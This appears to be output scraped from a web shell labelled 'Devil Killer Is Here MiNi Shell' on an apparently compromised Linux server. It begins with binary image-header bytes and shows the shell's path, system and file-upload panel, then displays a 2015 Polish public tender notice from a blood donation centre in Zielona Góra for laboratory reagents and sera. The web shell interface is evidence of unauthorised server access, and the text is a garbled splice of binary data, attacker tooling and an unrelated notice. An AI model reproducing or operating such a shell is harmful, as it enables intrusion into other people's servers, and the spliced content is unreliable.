JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151209/336092-N-2015.html

<p class="kh_header"><b>Zielona Góra: DOSTAWA ODCZYNNIKÓW I SUROWIC</b><br>
<b>Numer ogłoszenia: 336092 - 2015; data zamieszczenia: 09.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Krwiodawstwa i Krwiolecznictwa w Zielonej Górze , ul. Zyty 21, 65-046 Zielona Góra, woj. lubuskie, tel. 68 3298360, faks 68 3298399.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rckik.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ODCZYNNIKÓW I SUROWIC.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja w całości lub w częściach dostaw odczynników i surowic, partiami określonymi odrębnie wg potrzeb Zamawiającego, na zasadach opisanych w Istotnych postanowieniach umowy stanowiących załącznik nr 1 do Specyfikacji istotnych warunków zamówienia, Każda część przedmiotu zamówienia stanowi odrębne zadanie. Każdy z Wykonawców musi przystąpić, do co najmniej jednego całego zadania. Zamawiający nie dopuszcza możliwości dalszego podziału zadań. Szczegółowe zestawienie rodzaju i wielkości zamówienia określono poniżej:
zadanie 1) Odczynniki do posiadanego przez Zamawiającego sprzętu firmy ORTHO do metod manualnych (zestaw: wirówka, termostat oraz pipeta),
zadanie 1 poz. 1) Kaseta Neutralna 1 op. a 100 szt. (Kasety do mikrometody) op.6,
zadanie 1 poz.	2) Anti human globulin anti IgG do testu PTA 1 op. a 100 szt. (kasety do mikrometody) op.4,
zadanie 1 poz.	3) Anti human globulin IgG+C3d do testu PTA 1 op. a 100 szt.( kasety do mikrometody) op.6,
zadanie 1 poz.	4) Kaseta do oznaczania antygenów Rh: Blood gruping reagents anti-C, anti-E, anti-c, anti-e, anti-K ,1 op. a 100 szt. (kasety do mikrometody) op.10,
zadanie 1 poz.	5) Bliss 1 op. a 3 x10 ml op.15,
zadanie 2 poz.	1) Paski wskaźnikowe ph 5,0-8,0 DUOTEST 1 rolka a 5m rolka 1,
zadanie 2 poz.	2) Odczynnik Türka 1 op. a 1 litr op. 1,
zadanie 2 poz.	3) Trombina liofilizowana 500 -400- j.m. 5 amp. + rozpuszczalnik op.2, zadanie 2 poz.	4) Dimetylosulfotlenek - DMSO 99,5% 1 op. a 500 ml op.2, 
adanie 2 poz.5) Paski do moczu 10 parametrowe 1 op. a 100 szt. op.1, 
zadanie 3 poz. 1) Roztwór PBS gotowy do użycia 1 op. a 5l op.50,
zadanie 4 poz.1) Zestaw odczynników do elucji kwaśnej przeciwciał klasy IgG -20-5-8-ml op.1,
zadanie 5 poz.1) Surowica - odczynnik antyglobulinowy monoklonalny anty-IgG, przezroczysty, nie barwiony, 1 szt.  a 10 ml szt.12, 
zadanie 5 poz.	2) Surowica - odczynnik antyglobulinowy poliwalentny, 1 szt. a 5 ml, pojemnik z kroplomierzem, nieliofilizowana bezpośrednio do użycia, bezbarwna, przezroczysta szt.10, 
zadanie 6 poz. 1) Surowica anti-D standard, 1 szt. a 2 ml a 2 ml  mniejsze lub równe 0,05 IU-ml szt.10, 
zadanie 6 poz. 2) Surowica anti-D standard, 1 szt. a 2 ml  mniejsze lub równe 0,1 IU-ml szt. 10, 
zadanie 6 poz.3) Roztwór LISS, 1 szt. a 100 ml szt. 170, 
zadanie 6 poz. 4) Dolichotes,t  1 szt. a 2 ml szt. 20, 
zadanie 6 poz.5) Odczynnik papainowy do bezpośredniego użycia ,1 szt. a 3 - 4 ml szt.10, zadanie 6 poz. 6) PEG - glikol poletylenowy, 1 szt. a 5-10 ml ml100, 
zadanie 7 poz.1) Płytki Coun-Tact 1 op. a 20 szt. szt.600, 
zadanie 8 poz.1) Roztwór ACD 1 szt. a 500 ml szt.120, zadanie 9 poz. 1) Odczynnik monoklonalny Anty C a 5 ml szt.8,
zadanie 9 poz. 2) Odczynnik monoklonalny Anty E a 5 ml szt.8,
zadanie 9 poz. 3) Odczynnik monoklonalny Anty c a 5 ml	szt.10,
zadanie 9 poz. 4) Odczynnik monoklonalny Anty e a 5 ml	szt.15,
zadanie 9 poz. 5) Odczynnik monoklonalny Anty Cw a 2 ml szt.15,
zadanie 9 poz. 6) Odczynnik monoklonalny Anty Lea a 2 ml szt.10,
zadanie 9 poz. 7) Odczynnik monoklonalny Anty Leb  a 2 ml szt.15,
zadanie 9 poz. 8) Odczynnik monoklonalny Anty Jka  a 2 ml szt.15,
zadanie 9 poz. 9) Odczynnik monoklonalny Anty Jkb  a 2 ml szt.20,
zadanie 9 poz. 10) Odczynnik monoklonalny Anty S  a 2 ml szt.20,
zadanie 9 poz. 11) Odczynnik monoklonalny Anty s  a 2 ml szt.15,
zadanie 9 poz.12) Odczynnik monoklonalny Anty M  a 2 ml szt.20,
zadanie 9 poz. 13) Odczynnik monoklonalny Anty N  a 2 ml szt.15,
zadanie 9 poz. 14) Odczynnik monoklonalny Anty P1  a 2 ml szt.8,
zadanie 9 poz. 15) Odczynnik monoklonalny Anty K  1 op. a 5 - 10 ml. ml3 00
zadanie 9 poz. 16) Odczynnik monoklonalny Anty k (Celano) a 2 ml szt.15,
zadanie 9 poz. 17) Odczynnik monoklonalny anty-A drugi klon , a 10 ml szt.10,
zadanie 9 poz. 18) Odczynnik monoklonalny anty-A pierwszy klon , a 10 ml szt.10, 
zadanie 9 poz. 19) Odczynnik monoklonalny anty-B drugi klon, a 10 ml szt.5,
zadanie 9 poz.20) Odczynnik monoklonalny anty-B pierwszy klon, a 10 ml szt.5, 
zadanie 9 poz. 21) Odczynnik monoklonalny anty-D  IgM+IgG, a 10 ml szt.5, 
zadanie 9 poz. 22) Odczynnik monoklonalny anty-D RUM-1,  a 10 ml szt.5,
 zadanie 10 poz. 1) Odczynnik monoklonalny Anty Fya do testu bezpośredniej aglutynacji  a 2 ml szt.14,
zadanie 11 poz.1) Odczynnik monoklonalny Anty Fyb do testu bezpośredniej aglutynacjia 2 ml szt.14,
zadanie 12 poz.1) Surowica Anty Lua a 2 ml Zamawiający dopuszcza odczynnik monoklonalny szt.4,
zadanie 12 poz.2) Surowica Anty Lub a 2 ml Zamawiający dopuszcza odczynnik monoklonalny szt.4,
zadanie 12 poz. 3) Surowica Anty Kpa a 2 ml Zamawiający dopuszcza odczynnik monoklonalny szt.4,
zadanie 12 poz. 4) Surowica Anty Kpb a 2 ml Zamawiający dopuszcza odczynnik monoklonalny szt.4,
zadanie 13 poz.1) Glicerol (gliceryna bezwonna cz.d.a ) 1 op. a 1l op.4,
zadanie 14) Krwinki do badań serologicznych,
zadanie 14 poz. 1) Krwinki wzorcowe uczulone 0Rh+opłaszczone p-c anty-D a 2 ml, do metody probówkowej PTA stężenie od 25% do 40% szt. Razem 26, 
zadanie 14 poz. 2) Zestaw krwinek wzorcowych do układu ABO w płynie konserwującym a 4-5ml stężenie od 25% do 40% zestaw	13x2 Razem 26,
zadanie 14 poz.3) Zestaw krwinek wzorcowych do wykrywania przeciwciał w płynie konserwującym a 4-5 ml stężenie od 25% do 40% 	zestaw	13x1 Razem 13,	
zadanie 14 poz.4) Zestaw krwinek wzorcowych do identyfikacji przeciwciał w płynie konserwującym a 4-5 ml stężenie od 25% do 40%, jeden zestaw zawiera od 10 do 11 sztuk krwinek wzorcowych, zestaw  Razem 26,	
zadanie 14 poz.5) Dopełniający zestaw krwinek wzorcowych (do poz. 4) do identyfikacji przeciwciał w płynie konserwującym a 4-5 ml stężenie od 25% do 40%, 13 dostaw po 1 zestawie - dostawa raz w miesiącu, jeden zestaw zawiera od 6 do 8 sztuk krwinek wzorcowych, Razem 13,
zadanie 14 poz.6) Surowica grupy AB a 2-5 ml	zestaw., Razem 2,
zadanie 15 poz.1) Podstawowy zestaw krwinek A, B, Rh +-  do dziennej kontroli odczynników do oznaczania grup krwi  Razem 13,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielania zamówień uzupełniających, 
o których mowa w art. 67 ust. 1 pkt 7 ustawy - PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.50.00-0, 33.69.62.00-7, 33.69.61.00-6, 33.65.15.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia powyższy warunek , Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez sprawdzenie, czy żądane przez Zamawiającego dokumenty i oświadczenia potwierdzają spełnienie warunków wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia powyższy warunek , Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez sprawdzenie, czy żądane przez Zamawiającego dokumenty i oświadczenia potwierdzają spełnienie warunków wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia powyższy warunek , Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez sprawdzenie, czy żądane przez Zamawiającego dokumenty i oświadczenia potwierdzają spełnienie warunków wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia powyższy warunek , Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez sprawdzenie, czy żądane przez Zamawiającego dokumenty i oświadczenia potwierdzają spełnienie warunków wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia powyższy warunek , Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez sprawdzenie, czy żądane przez Zamawiającego dokumenty i oświadczenia potwierdzają spełnienie warunków wg zasady spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, należy przedstawić następujące dokumenty:
1) Deklarację zgodności CE z normami UE potwierdzająca oznakowanie oferowanych odczynników znakiem CE,
2)	Deklarację Wytwórcy (Producenta) o spełnieniu wymagań zasadniczych dla wyrobów medycznych i Certyfikat Jednostki Notyfikowanej, jeśli tego wymaga Ustawa z dnia 24 maja 2010 o wyrobach medycznych (Dz.U. 2015 poz. 876 jt.),
3)		dla zadań nr 1, 3, 4, 5, 6, 9, 10, 11, 12, 14, 15:
oświadczenie, że: wszystkie odczynniki dla zadań nr 1, 3, 4, 5, 6, 9, 10, 11, 12, 14, 15, spełniają wymagania Instytutu Hematologii i Transfuzjologii zawarte w przepisach Medyczne zasady pobierania krwi, oddzielania jej składników i wydawania - obowiązujące w jednostkach organizacyjnych publicznej służby krwi pod redakcja Magdaleny Łętowskiej (aktywność, miano, moc, swoistość) .</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dla zadnia nr 1 na potwierdzenie posiadania wiedzy i doświadczenia,  Wykonawca do oferty załączy wykaz wykonanych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonana i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane należycie. Za spełnienie warunku posiadania doświadczenia Zamawiający uzna, gdy Wykonawca dla zadania nr 1 przedstawi w wykazie minimum trzy dostawy odczynników do posiadanego przez Zamawiającego sprzętu firmy ORTHO do metod manualnych, przy czym wartość każdej dostawy jest większa od 35 000,00 zł ze wskazaniem Zleceniodawców oraz dokumentów wskazujących na należyte wykonanie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - kontraktowe/ czas dostawy zamówienia/ - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ust. 1 PZP Zamawiający zastrzega sobie możliwość zmiany istotnych postanowień zawartej umowy w sytuacji obiektywnej konieczności wprowadzenia zmiany, w niżej przedstawionym zakresie z zastrzeżeniem art. 140 ust. 1 i 3 ustawy PZP:
a)	zmiany warunków i terminów dostawy przedmiotu zamówienia - zmiany te mogą wystąpić na skutek negatywnych okoliczności mających bezpośredni wpływ na organizacje dostaw, trudności transportowych, celnych,
b)	zmiany terminu i sposobu spełnienia świadczeń na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
- niedostępność na rynku materiałów lub urządzeń wskazanych w SIWZ spowodowana zaprzestaniem produkcji lub wycofania z rynku materiałów lub urządzeń, jeśli ta zmiana nie będzie miała wpływu na wynagrodzenie umowne,
- pojawienie się na rynku materiałów lub nowszych urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotów umowy lub kosztów eksploatacji przedmiotu umowy,
c)	zmiany danych Wykonawcy (np. zmiana siedziby, adresu, nazwy) lub zmiana wynikająca z przekształcenia podmiotowego po stronie Wykonawcy,
d)	zmiany wynikające ze zmiany w prawie właściwym dla podatków lub ceł, które podwyższają lub obniżają cenę przedmiotu zamówienia, co będzie skutkowało obniżeniem lub podwyższeniem ceny jednostkowej przedmiotu zamówienia,
e)		zmiany wynikające z niezgodności pomiędzy zapisami umowy a treścią oferty i/lub SIWZ.
2.	Zamawiający zastrzega sobie również możliwość zmiany, z zastrzeżeniem art. 140 ust. 1 i 3 ustawy PZP w przypadku:
a)	zmiany w obowiązujących przepisach prawa mające wpływ na przedmiot 
i warunki umowy przez zmianę sytuacji prawnej lub faktycznej Wykonawcy i/lub Zamawiającego skutkująca nie możliwością realizacji umowy,
b)	powstanie nadzwyczajnych okoliczności (nie będących siłą wyższą) grożące rażącą stratą, których strony nie przewidziały przy zawarciu umowy.
3.	Zamawiający zastrzega sobie możliwość dokonania zmiany terminu obowiązywania umowy tj. przedłużenia terminu trwania umowy, w sytuacji niewykorzystania wartości brutto umowy do pierwotnego terminu jej trwania. Wydłużenie umowy nie może przekroczyć kolejnych 12 miesięcy.
7.	Wyżej wymienione zmiany mogą być dokonane na wniosek Zamawiającego lub Wykonawcy, za zgodą obu stron i zostaną wprowadzone do umowy aneksem</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rckik.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Krwiodawstwa 
i Krwiolecznictwa w Zielonej Górze ul. Zyty 21
65-046 Zielona Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2015 godzina 13:00, miejsce: Regionalne Centrum Krwiodawstwa 
i Krwiolecznictwa w Zielonej Górze ul. Zyty 21
